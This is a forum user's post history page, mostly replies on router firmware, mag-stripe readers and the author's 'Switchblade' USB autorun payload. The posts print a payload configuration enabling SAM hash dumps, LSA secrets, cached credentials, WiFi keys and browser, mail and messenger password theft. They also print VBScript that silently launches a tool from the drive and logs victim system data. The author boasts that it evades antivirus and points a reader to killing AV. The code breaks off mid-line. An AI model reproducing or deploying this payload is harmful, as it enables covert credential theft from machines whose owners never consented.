beakmyn's Content - Page 13

Fon Promo Code

beakmyn replied to bmwracer0's topic in WiFi Pineapples Mark I, II, III

Yes, You'll need to use Gargoyle and AP51 to get openwrt on it. It's still basically point and click for the technically challenged. Although the plus is a bit a PITA getting openwrt on it. It tooks me several tries. Whereas DD-WRT does it in one try. PM me and I'll send an invite which I believe gets you the Fon+ for $19.95

Fon Promo Code

beakmyn replied to bmwracer0's topic in WiFi Pineapples Mark I, II, III

I've got 17 invitations also. PM me with you're email and I'll send it out to you.

Mag-stripe readers

beakmyn replied to coyotepedia's topic in Hacks & Mods

Track 1 and Tarack 3 are typically propriatary to the manufacturer. I.e. it's not going to be the same for every card. Sometimes it's just a repeat of what's on track 2. You'll also find the not everybody uses the standard protocol such as hotel door cards.

=GonZor=- Payload V2.0

beakmyn replied to Dan's topic in USB Hacks

Since Gonzor's seems to be MIA I'll have to re-release my version and update any needed files first. I believe mine still "flys under the radar" on Antivirus engines since Mcafee, Norton and AVG have Gonzor's virus signature.

Mag-stripe readers

beakmyn replied to coyotepedia's topic in Hacks & Mods

If you want hardware level control $3.50USD http://www.allelectronics.com/make-a-store...READER/-/1.html You'll need to build an interface. But this will give you the raw data out. So it will give you the most control. I.E. if you're reading a non-standard card (hotel key cards). Not difficult if you know assembly ;) If you want to read standard cards (track 1,2,3/credit card, driver's license, etc) http://www.sparkfun.com/commerce/product_i...roducts_id=8633 Singular a company based in Taiwan used to send free samples out if you asked nicely. That's how I got my serial reader. You won't get a magstripe writer for less then about $140USD. It will only write the standard format and may only write tracks 1,2

What's your source for illuminated switches?

beakmyn replied to wire's topic in Questions

Try Grainger's or local electrical supply shop. Most towns that have any type of manufacturing have a local electrical supply shop that services them. Heck go down the industrial area of your town and ask the secretary at the front desk if she knows the names of the local shops. BTW, most elevator buttons are going to be rated to run at 240VAC not 110VAC

Shannon is hot!

beakmyn replied to ward's topic in Everything Else

There's some OTC remedies for Menopause, you might want to look into that.

Shmoocon Secure Connection

beakmyn replied to Deathdefyer2002's topic in Security

Last year Shmoocon set up a nice secure network for the Con. I forget the details but I believe it was a Radius system with certificates. A lot of people were saying it was one the best Con networks they'd used. There is wifi at the hotel but you have to pay for it and it isn't cheap or secure. Everyone knows that you don't fsck with the Con network and you're pretty safe on it. However the hotel's wifi well that gets treated differently. If you have to check you're company email then you'd better be tunneled through a VPN or at the bare minimum being using the https:// webmail interface. It's 3 days do your REALLY have to check it? If you're planning on blogging, chatting then use the Con network. If you're just surfing the web, hell pay to use the hotel network. Or do as we did and Pwn the kiosks :). I'll unlock them all this year! Me I have a VPN at home that I tunnel all my traffic through.

Anybody used TrueCrypt?

beakmyn replied to pritchard9's topic in Questions

If admin hasn't installed and you're not an admin then no truecrypt. http://www.truecrypt.org/docs/?s=administrator-privileges There is however Rohos, a freeware program that does not require admin rights. However it is closed source so there's no way to verify it's integrity. http://www.rohos.com/free-encryption/downloads/

U3 Incident Response Payload

beakmyn replied to Tcstool's topic in USB Hacks

@jdogherman Yes, using vbscript I do it in my hacksaw @tcstool What are you looking for when you dump the registry? I would think you'd want the various autorun values as a start. Then go from there. The directory list also took a fair amount of space on my sytems also.

U3 Incident Response Payload

beakmyn replied to Tcstool's topic in USB Hacks

Ok, so I decided to run the tool on my own pc. It took several minutes and I ended up with 200MB of information. Hmm, a bit large. I saw the issue with redistributing 3rd party tools one solution which I've been adapting is the here: http://episteme.arstechnica.com/eve/forums.../m/429006588831 It will download the tools on the fly when run. So, we could instruct folks to run the "setup" batch file before creating their iso Otherwise I can do all this with WMI and vbs scripting like I said before, but I know your trying to stay away from that since you don't want have to work around an overzealous sysadmin whose blocked vbs files, but the initial autorun is vbs ;) So, I can do formatting of the batch file output in batch but it's very painful. Although it's not as easy we could compile the .vbs to exe but from what I've found in the past some programs just wrap the vbs in a exe.

Beakmyn's Switchblade (mod of Gonzor) written in vbs with HTML output

beakmyn replied to beakmyn's topic in USB Hacks

There may be a new version of firepassword available. For the antivirus you'll need to research on methods of detecting AV and killing them or other methods available on this forum

Notes for Jasager on Fon+ 2201

beakmyn replied to Rob's topic in WiFi Pineapples Mark I, II, III

<edit> Ok, I'm back to DD-wrt v24 with working LAN/WAN and wifi. So, what's stopping me from implementing this in DD-wrt? I didn't see where that question got fully answered. I'm willing do to some grunt work with cross-compiling, etc but I'd like your input on the probability of getting this to work.

Notes for Jasager on Fon+ 2201

beakmyn replied to Rob's topic in WiFi Pineapples Mark I, II, III

I'll keep trying. I did find this: http://www.lefinnois.net/wpen/index.php/20...work-on-fonera/ It looks like he's got a workaround for ethernet. I'll try this way using tftpd rather then ap51 and see where that gets me.

Notes for Jasager on Fon+ 2201

beakmyn replied to Rob's topic in WiFi Pineapples Mark I, II, III

Ah poopy. It's not bricked yet! So I tried using Kamikaze 7.09 with ap-51 gui. I thought that'd be easy then the old method I used to get dd-wrt on it. I was wrong. It looked like everything went ok with loading the rootfs and kernel and the ap51 program said it reset the router but I got nothing. Well almost nothing. I've got a Redboot prompt so I've got a way out. I'm wondering if anybody's gotten here and then what they did? I'm thinking I'm going to need to do the following to get it up and going again. RedBoot> fconfig -l -n boot_script: true boot_script_data: .. fis load -b 0x80100000 loader .. go 0x80100000 boot_script_timeout: 2 bootp: false bootp_my_gateway_ip: 0.0.0.0 bootp_my_ip: 192.168.1.1 bootp_my_ip_mask: 255.255.255.0 bootp_server_ip: 192.168.1.254 console_baud_rate: 9600 gdb_port: 9000 info_console_force: false net_debug: false RedBoot> fconfig Run script at boot: true Boot script: .. fis load -b 0x80100000 loader .. go 0x80100000 Enter script, terminate with empty line >> fis load -l vmlinux.bin.l7 >> exec >> Boot script timeout (1000ms resolution): 10 Use BOOTP for network configuration: false Gateway IP address: Local IP address: 192.168.10.10 Local IP address mask: 255.255.255.0 Default server IP address: 192.168.10.1 Console baud rate: 9600 GDB connection port: 9000 Force console for special debug messages: false Network debug at boot time: false Update RedBoot non-volatile configuration - continue (y/n)?y What do you think?

binding the windows key in lunux

beakmyn replied to RogueHart's topic in Questions

http://do.davebsd.com/

Beakmyn's Switchblade (mod of Gonzor) written in vbs with HTML output

beakmyn replied to beakmyn's topic in USB Hacks

The payload ini file <flash drive>\system\src\payload.ini [Payload] ;Set Enables based on OS Version WIN98 = 1 WINME = 1 WIN2K = 1 XP = 1 VISTA = 1 WIN2003 = 1 UNKNOWN = 1 [U3] Enable = 1 [Variables] Timer=1721 [Log Path] ;Log path will be flash drive \ <Dir> \computername ;I'll put in the slashes at the beginning and end Dir = Documents [System Info] Enable = 1 [Users] ;Method 1 = low detail 2 =high detail (20 sec procces time) Method = 1 [External IP] Enable = 0 url = http://checkip.dyndns.org/ ;1 = XMLHTTP 2=wget (requires exe) Method = 1 [VNC] ;Not IMPLEMENTED Enable = 0 [Haksaw] ;Not IMPLEMENTED Enable = 0 emailfrom = emailto = password = subject = %computername%_ip client = yes taskbar = no [SMTP] accept = 127.0.0.1:1099 connect = smtp.gmail.com:465 [WIFI Key] Enable = 1 [SAM PWDUMP] Enable = 0 KeepFile = 1 [SAM FGDUMP] Enable = 1 KeepFile = 1 [Network Password] Enable = 1 [Mail Password] Enable = 1 [Firefox Password] Enable = 1 [IE Password] Enable = 1 [Messenger Password] Enable = 1 [Cache] Enable = 1 KeepFile = 0 ;1 = FGDump.exe 2=Cachedump.exe Method = 1 [LSA Secrets] Enable = 1 [Product Keys] Enable = 0 [IE URL History] Enable = 1 [Windows Updates List] Enable = 0 [Firewall Status] Enable = 0 [Open Port Scan] Enable = 0 [Clipboard] Enable = 1 [Win Audit] Enable = 0 cmdline = /r=oxutn /o=HTML /m=CA Security Scan [WPA] Enable = 0 [Nirtone] Enable = 1 Tone_1 = 2000 150 Tone_2 = 4000 150

Beakmyn's Switchblade (mod of Gonzor) written in vbs with HTML output

beakmyn replied to beakmyn's topic in USB Hacks

My "amish" version on the flash drive in case I can't access the CD-Rom for some reason <fd>\autorun.vbs Set objFSO = CreateObject("Scripting.FileSystemObject") Set objShell = CreateObject("Wscript.Shell") Set colDrives = objFSO.Drives On Error Resume Next Dim aryVersion strComputerName = objShell.ExpandEnvironmentStrings("%computername%") 'strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2) 'strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2) For Each objDrive in colDrives 'ignore floppy drives - reserved by BIOS if they don't exist If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\payload.ini") Then strfd = objDrive.Driveletter & ":" End If If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\payload.vbs") Then strU3 = objDrive.Driveletter & ":" End If End if Next objShell.Run ".\fc\fc.exe", 0, False wscript.Quit 'In case machine doesn't have new Scripting Engine 5.0 or later we use the version without regular expressions Function MyTrim(mystring) Dim start,Endpos start=1 for i=1 to Len(mystring) if Mid(mystring,i,1)=vbTab or Mid(mystring,i,1)=" " Then start=i+1 else exit for end if next Endpos=Len(mystring) for i=Len(mystring) to 1 step -1 if Mid(mystring,i,1)=vbTab or Mid(mystring,i,1)=" " Then Endpos=i-1 else exit for end if next if (endpos-start+1)<0 then MyTrim="" Exit Function end if MyTrim=Mid(mystring,start,Endpos-start+1) End Function Function ReadINI(section,key,filename) if objFSO.FileExists(filename) then Dim fReadINI, bsection bsection=False Set fReadINI = objFSO.OpenTextFile(filename,1) Do while not(fReadINI.AtEndOfStream) Dim strini,trimstrini strini = fReadINI.ReadLine trimstrini = MyTrim(strini) if Left(trimstrini,1)="[" and Right(Trimstrini,1)="]" then if StrComp(Trimstrini,"[" & MyTrim(section) & "]",1)=0 Then bsection=True else bsection =False end if Else if bsection then Dim poskey poskey = InStr(Trimstrini,"=") if posKey>0 then if StrComp(MyTrim(Left(Trimstrini,poskey-1)),MyTrim(key),1)=0 Then ReadINI = MyTrim(Mid(Trimstrini,poskey+1)) Exit Function end If End if end if End if Loop End if ReadINI = "" End Function

Beakmyn's Switchblade (mod of Gonzor) written in vbs with HTML output

beakmyn replied to beakmyn's topic in USB Hacks

<CD>\System\src\payload.vbs On Error Resume Next Dim ArgObj, fd, U3, strComputerName, strLogPath, strIncludePath, strUserName Dim strDate, strTime, objTextFile Dim objNet, objFSO, oExec, objShell, objLeftFile, objRightFile, OS, Sleepms, isAdmin Set ArgObj = WScript.Arguments Set objNet = CreateObject("WScript.NetWork") Set objFSO = CreateObject("Scripting.FileSystemObject") Set objShell = CreateObject("Wscript.Shell") Const FOR_READING = 1 Const FOR_APPENDING = 8 Const FOR_WRITING = 2 Const ssfHISTORY = 34 ' Create constants for access rights and registry hive const KEY_QUERY_VALUE = &H0001 const KEY_SET_VALUE = &H0002 const KEY_CREATE = &H0032 const KEY_CREATE_SUB_KEY = &H0004 const KEY_DELETE = &H00010000 const HKEY_LOCAL_MACHINE = &H80000002 'fd ="c:\" 'U3 = "c:\System\SRC" fd=ArgObj(0) & "\" U3=ArgObj(1) & "\System\SRC" strOS = ArgObj(2) Set ArgObj = Nothing strComputerName = objNet.ComputerName strUserName = objNet.UserName strDomain = objNet.UserDomain Set objNet = Nothing strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2) strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2) 'Month/Day/Year strFormDate = Right("0" & Month(now()), 2) & "\" & Right("0" & Day(now()), 2) & "\" & Year(now()) 'HH:MM:SS strFormTime = Right("0" & Hour(now()), 2) & ":" & Right("0" & Minute(now()), 2) & ":" & Right("0" & Second(now()), 2) 'Change Directory objShell.CurrentDirectory = U3 strIniFile = fd & "System\SRC\payload.ini" strLogPath = fd & ReadINI("Log Path","Dir",strIniFile) & "\" & strComputerName strCurLog = strLogPath & "\" & strDate & "-" & strTime 'SET LOG PATHS If not objFSO.FolderExists(strLogPath) Then objFSO.CreateFolder strLogPath End If If Not objFSO.FolderExists(strCurLog) Then objFSO.CreateFolder strCurLog End if strhtmFile = strLogPath & "\" & strComputerName & "-[" & strDate & "-" & strTime & "].html" strlhtmFile = strCurLog & "\left-[" & strDate & "-" & strTime & "].html" strrhtmFile = strCurLog & "\right-[" & strDate & "-" & strTime & "].html" strtmpFile = strLogPath & "\" & strComputerName & ".tmp" strFireFile = strLogPath & "\" & strComputerName & ".fire" winaud = ReadINI("Win Audit","cmdline",strIniFile) nirtone1 =ReadINI("Nirtone","Tone_1",strIniFile) nirtone2 =ReadINI("Nirtone","Tone_2",strIniFile) 'LEFT PANEL HTML - LIST Set objLeftFile = objFSO.CreateTextFile(strlhtmFile) objLeftFile.Close Set objLeftFile = objFSO.OpenTextFile(strlhtmFile,FOR_APPENDING) objLeftFile.WriteLine"<!DOCTYPE HTML PUBLIC ""-//W3C//DTD HTML 4.01 Transitional//EN""> " objLeftFile.WriteLine"<html><head><title>" & strComputerName & "</title> " objLeftFile.WriteLine"<meta name=""generator"" content=""SwitchBlade""><meta http-equiv=""Content-Type"" content=""text/html; charset=utf-8""><style type=""text/css""> " objLeftFile.WriteLine" " objLeftFile.WriteLine"--> " objLeftFile.WriteLine"</style></head> " objLeftFile.WriteLine"<body topmargin=""0"" leftmargin=""0"" style=""background-color: rgb(219, 217, 202);"" vlink=""#0000ff""><table style=""width: 500px;"" border=""0""><tbody><tr><td style=""background-color: rgb(204, 102, 0);""><b><font color=""#ffffff"">" & strComputerName & "</font></b></td></tr> " '::MAIN HTML - OPENS LEFT AND RIGHT PANELS" Set objTextFile = objFSO.CreateTextFile(strhtmFile) objTextFile.Close Set objTextFile = objFSO.OpenTextFile(strhtmFile,FOR_APPENDING) objTextFile.WriteLine"<!DOCTYPE HTML PUBLIC ""-//W3C//DTD HTML 4.01 Transitional//EN""> " objTextFile.WriteLine"<html><head> " objTextFile.WriteLine" " objTextFile.WriteLine"<title>Switchblade Audit " & strComputerName & "</title><meta name=""generator"" content=""SwitchBlade""> " objTextFile.WriteLine"<meta name=""author"" content=""Hak.5""> " objTextFile.WriteLine"<meta http-equiv=""Content-Type"" content=""text/html; charset=utf-8""> " objTextFile.WriteLine"<style type=""text/css""> " objTextFile.WriteLine" " objTextFile.WriteLine"</style></head> " objTextFile.WriteLine"" objTextFile.WriteLine"<frameset cols=""20%, *""><frame name=""left"" src=""" & ".\" & strDate & "-" & strTime & "\left-[" & strDate & "-" & strTime & "].html" & """><frame name=""right"" src=""" & ".\" & strDate & "-" & strTime & "\right-[" & strDate & "-" & strTime & "].html" & """></frameset></html> " objTextFile.Close Set objTextFile = Nothing Set objRightFile = objFSO.CreateTextFile(strrhtmFile) objRightFile.Close Set objRightFile = objFSO.OpenTextFile(strrhtmFile,FOR_APPENDING) '::RIGHT PANEL HTML - The Good stuff objRightFile.WriteLine" <!DOCTYPE HTML PUBLIC ""-//W3C//DTD HTML 4.01 Transitional//EN"">" objRightFile.WriteLine" <html><head> " objRightFile.WriteLine" <meta name=""generator"" content=""SwitchBlade""><meta name=""author"" content=""Hak.5""><meta http-equiv=""Content-Type"" content=""text/html; charset=utf-8""><style type=""text/css""> " objRightFile.WriteLine"  " objRightFile.WriteLine" </style></head> " objRightFile.WriteLine" " objRightFile.WriteLine" <body><a name=""doc_top""></a><table align=""right"" border=""0"" rules=""none""><tbody><tr><td align=""right""></td> " objRightFile.WriteLine" </tr></tbody></table><p> </p> " objRightFile.WriteLine" <center><p><font size=""4""><b>Computer Audit :: " & strFormDate & " " & strFormTime & "</b></font></p><br> " '+----------------------------------+ '+ [Setup] + '+----------------------------------+ Sleepms = ReadINI("Variables","Timer",strIniFile) Set objReg=GetObject("winmgmts:"_ & "{impersonationLevel=impersonate}!\\.\root\default:StdRegProv") strKeyPath = "SYSTEM\CurrentControlSet" isAdmin = False ' Does the account under which the script runs have the ' right to query the SYSTEM\CurrentControlSet key objReg.CheckAccess HKEY_LOCAL_MACHINE, strKeyPath, _ DELETE, isAdmin ':: PAYLOAD If ReadINI("System Info","Enable",strIniFile) Then '+----------------------------------+ '+ [BIOS] + '+----------------------------------+ objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_0"" target=""right"">BIOS Overview</a></b></td></tr>" objRightFile.WriteLine"<p><a name=""cat_0""></a><font size=""5""><b>System Overview</b></font></p><p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><font size=""3""><b>BIOS Overview</b></font>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Item</b></td>" & _ "<td class=""colhead""><b>Value</b></td></tr>" Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime") Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\.\root\cimv2") Set colBIOS = objWMIService.ExecQuery("Select * from Win32_BIOS") For Each objBIOS in colBIOS objRightFile.WriteLine "<tr><td><b>Build Number</b></td><td>" & objBIOS.BuildNumber & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Current Language</b></td><td>" & objBIOS.CurrentLanguage & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Manufacturer</b></td><td>" & objBIOS.Manufacturer & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Name</b></td><td>"& objBIOS.Name & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Primary BIOS</b></td><td>" & objBIOS.PrimaryBIOS & "</td></tr>" dtmConvertedDate.Value = objBIOS.ReleaseDate dtmReleaseDate = dtmConvertedDate.GetVarDate objRightFile.WriteLine "<tr><td><b>Release Date</b></td><td>" & dtmReleaseDate & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Serial Number</b></td><td>" & objBIOS.SerialNumber & "</td></tr>" objRightFile.WriteLine "<tr><td><b>SMBIOS Version</b></td><td>" & objBIOS.SMBIOSVersion & "</td></tr>" objRightFile.WriteLine "<tr><td><b>SMBIOS Major Version</b></td><td>" & objBIOS.SMBIOSMajorVersion & "</td></tr>" objRightFile.WriteLine "<tr><td><b>SMBIOS Minor Version</b></td><td>" & objBIOS.SMBIOSMinorVersion & "</td></tr>" objRightFile.WriteLine "<tr><td><b>SMBIOS Present?</b></td><td>" & objBIOS.SMBIOSPresent & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Status</b></td><td>" & objBIOS.Status & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Version</b></td><td>" & objBIOS.Version & "</td></tr>" & _ "</td></tr>" Next Set dtmConvertedDate = Nothing Set objWMIService = Nothing Set colBIOS = Nothing 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" '+----------------------------------+ '+ [System info] + '+----------------------------------+ objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_1"" target=""right"">OS OverView</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_1""></a><font size=""3""><b>OS Overview</b></font></p><p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Item</b></td>" & _ "<td class=""colhead""><b>Value</b></td></tr>" Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime") Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\.\root\cimv2") Set colOSes = objWMIService.ExecQuery("Select * from Win32_OperatingSystem") For Each objOS in colOSes objRightFile.WriteLine "<tr><td><b>Logged On User</b></td><td>" & strUserName & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Computer Name</b></td><td>" & objOS.CSName & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Domain</b></td><td>" & strDomain & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Caption</b></td><td>" & objOS.Caption & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Build Number</b></td><td>"& objOS.BuildNumber & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Build Type</b></td><td>" & objOS.BuildType & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Boot Device</b></td><td>" & objOS.BootDevice & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Country Code</b></td><td>" & objOS.CCountryCode & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Debug</b></td><td>" & objOS.Debug & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Encryption Level</b></td><td>" & objOS.EncryptionLevel & "</td></tr>" dtmConvertedDate.Value = objOS.InstallDate dtmInstallDate = dtmConvertedDate.GetVarDate objRightFile.WriteLine "<tr><td><b>Install Date</b></td><td>" & dtmInstallDate & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Licensed Users</b></td><td>" & objOS.NumberOfLicensedUsers & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Organization</b></td><td>" & objOS.Organization & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Language</b></td><td>" & objOS.Language & "</td></tr>" objRightFile.WriteLine "<tr><td><b>OS Type</b></td><td>" & objOS.OSType & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Primary OS</b></td><td>" & objOS.Primary & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Registered User</b></td><td>" & objOS.RegisteredUser & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Serial Number</b></td><td>" & objOS.SerialNumber & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Other Type Description</b></td><td>" & objOS.OtherTypeDescription & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Version</b></td><td>" & objOS.Version & "</td></tr>" objRightFile.WriteLine "<tr><td><b>Service Pack</b></td><td>" & objOS.ServicePackMajorVersion & "." & _ objOS.ServicePackMinorVersion & "</td></tr>" Next Set dtmConvertedDate = Nothing Set objWMIService = Nothing Set colOSes = Nothing 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\.\root\cimv2") Set colAdapters = objWMIService.ExecQuery _ ("SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True") n = 1 objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_2"" target=""right"">Network Adapters</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_2""></a><font size=""3""><b>Network Adapters</b></font></p><p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" For Each objAdapter in colAdapters 'Create a table objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Entry Name</b></td>" & _ "<td class=""colhead""><b>"& objAdapter.Description &"</b></td></tr>" objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Adapter Name</b></td><td>"& n &"</td></tr>" objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Adapter Description</b></td><td>"& objAdapter.Description &"</td></tr>" objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>APhysical (MAC) address</b></td><td>"& objAdapter.MACAddress &"</td></tr>" objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Host name</b></td><td>"& objAdapter.DNSHostName &"</td></tr>" If Not IsNull(objAdapter.IPAddress) Then objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>IP address</b></td><td>" For i = 0 To UBound(objAdapter.IPAddress) objRightFile.WriteLine objAdapter.IPAddress(i) & vbCrLf Next objRightFile.WriteLine "</td></tr>" End If If Not IsNull(objAdapter.IPSubnet) Then objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Subnet</b></td><td>" For i = 0 To UBound(objAdapter.IPSubnet) objRightFile.WriteLine objAdapter.IPSubnet(i) & vbCrLf Next objRightFile.WriteLine "</td></tr>" End If If Not IsNull(objAdapter.DefaultIPGateway) Then objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Default Gateway</b></td><td>" For i = 0 To UBound(objAdapter.DefaultIPGateway) objRightFile.WriteLine objAdapter.DefaultIPGateway(i) & vbCrLf Next objRightFile.WriteLine "</td></tr>" End If If Not IsNull(objAdapter.DNSServerSearchOrder) Then objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>DNS servers in search order</b></td><td>" For i = 0 To UBound(objAdapter.DNSServerSearchOrder) objRightFile.WriteLine objAdapter.DNSServerSearchOrder(i) & vbCrLf Next objRightFile.WriteLine "</td></tr>" End If objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>DNS servers in search order</b></td><td>" & objAdapter.DNSDomain & "</td></tr>" If Not IsNull(objAdapter.DNSDomainSuffixSearchOrder) Then objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>DNS suffix search list</b></td><td>" For i = 0 To UBound(objAdapter.DNSDomainSuffixSearchOrder) objRightFile.WriteLine objAdapter.DNSDomainSuffixSearchOrder(i) & vbCrLf Next objRightFile.WriteLine "</td></tr>" End If objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>DHCP enabled</b></td><td>"& objAdapter.DHCPEnabled &"</td></tr>" objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>DHCP server</b></td><td>"&objAdapter.DHCPServer &"</td></tr>" If Not IsNull(objAdapter.DHCPLeaseObtained) Then utcLeaseObtained = objAdapter.DHCPLeaseObtained strLeaseObtained = WMIDateStringToDate(utcLeaseObtained) Else strLeaseObtained = "" End If objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Lease Obtained</b></td><td>"& strLeaseObtained &"</td></tr>" If Not IsNull(objAdapter.DHCPLeaseExpires) Then utcLeaseExpires = objAdapter.DHCPLeaseExpires strLeaseExpires = WMIDateStringToDate(utcLeaseExpires) Else strLeaseExpires = "" End If objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Lease Expires</b></td><td>"& strLeaseExpires &"</td></tr>" objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Primary WINS Server</b></td><td>"& objAdapter.WINSPrimaryServer &"</td></tr>" objRightFile.WriteLine "<tr><td bgcolor=""#ffffff""><b>Secondary WINS Server</b></td><td>"& objAdapter.WINSSecondaryServer &"</td></tr>" 'End Table objRightFile.WriteLine "</tbody></table><p> </p>" n = n + 1 Next '+----------------------------------+ '+ [Shares] + '+----------------------------------+ objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_4"" target=""right"">System Shares</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_4""></a><font size=""3""><b>System Shares</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\.\root\cimv2") Set colShares = objWMIService.ExecQuery("Select * from Win32_Share") 'Create a table objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Allow Maximum</b></td>" & _ "<td class=""colhead""><b>Caption</b></td>" & _ "<td class=""colhead""><b>Maximum Allowed</b></td>" & _ "<td class=""colhead""><b>Name</b></td>" & _ "<td class=""colhead""><b>Path</b></td>" & _ "<td class=""colhead""><b>Type</b></td></tr>" For each objShare in colShares objRightFile.WriteLine "<tr><td>" & objShare.AllowMaximum & "</td>" objRightFile.WriteLine "<td>" & objShare.Caption & "</td>" objRightFile.WriteLine "<td>" & objShare.MaximumAllowed & "</td>" objRightFile.WriteLine "<td>" & objShare.Name & "</td>" objRightFile.WriteLine "<td>" & objShare.Path & "</td>" objRightFile.WriteLine "<td>" & objShare.Type & "</td></tr>" Next Set objWMIService = Nothing Set colShares = Nothing 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" '+----------------------------------+ '+ [Users] + '+----------------------------------+ objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_5"" target=""right"">System Users</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_5""></a><font size=""3""><b>System Users</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" strLine = "" If ReadINI("Users","Method",strIniFile) = 1 Then 'Create a table objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Account Type</b></td>" & _ "<td class=""colhead""><b>Caption</b></td>" & _ "<td class=""colhead""><b>Description</b></td>" & _ "<td class=""colhead""><b>Disabled</b></td>" & _ "<td class=""colhead""><b>Domain</b></td>" & _ "<td class=""colhead""><b>Full Name</b></td>" & _ "<td class=""colhead""><b>Local Account</b></td>" & _ "<td class=""colhead""><b>Lockout</b></td>" & _ "<td class=""colhead""><b>Name</b></td>" & _ "<td class=""colhead""><b>Password Changeable</b></td>" & _ "<td class=""colhead""><b>Password Expires</b></td>" & _ "<td class=""colhead""><b>Password Required</b></td>" & _ "<td class=""colhead""><b>SID</b></td>" & _ "<td 